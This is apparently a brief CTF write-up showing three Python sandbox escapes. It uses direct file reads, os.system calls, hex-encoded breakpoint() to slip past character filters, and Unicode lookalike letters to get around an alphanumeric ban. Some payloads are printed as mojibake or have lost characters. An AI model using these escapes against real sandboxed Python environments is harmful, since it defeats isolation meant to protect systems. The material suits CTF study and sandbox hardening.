[ back to entries ]

Python Jailbreak Techniques

$ date:
$ read_time:1 min
ā€¢ CTF Writeup

```

Python Jailbreak Techniques: Three Levels of Escalation

1. Baby Jail

Scenario: No restrictions, simplest bypass

Solutions: ```python open("/flag.txt").read() ``` ```python import('os').system("cat /flag.txt") ```

2. Bahri Jail

Scenario: Basic character restrictions

Solution: Hex-encoded breakpoint() ``` exec(bytes.fromhex('627265616b706f696e7428')) # breakpoint() ``` Then in debugger: ```python import os; os.system("cat /flag.txt") ```

3. Silent Jail

Scenario: All alphanumerics banned (A-Z,a-z,0-9)

Solution: Unicode homoglyph attack ```python š˜£š˜³š˜¦š˜¢š˜¬š˜±š˜°š˜Ŗš˜Æš˜µ() # breakpoint() using mathematical sans-serif italic ``` Then in debugger: ```python š˜Ŗš˜®š˜±š˜°š˜³š˜µ š˜°š˜“; š˜°š˜“.š˜“š˜ŗš˜“š˜µš˜¦š˜®("š˜¤š˜¢š˜µ /š˜§š˜­š˜¢š˜Ø.š˜µš˜¹š˜µ") ```

Key Notes:

  • Breakpoint() is the universal starting point
  • Unicode chars bypass character filters but execute normally
  • Hex/bytes encoding bypasses string-based filters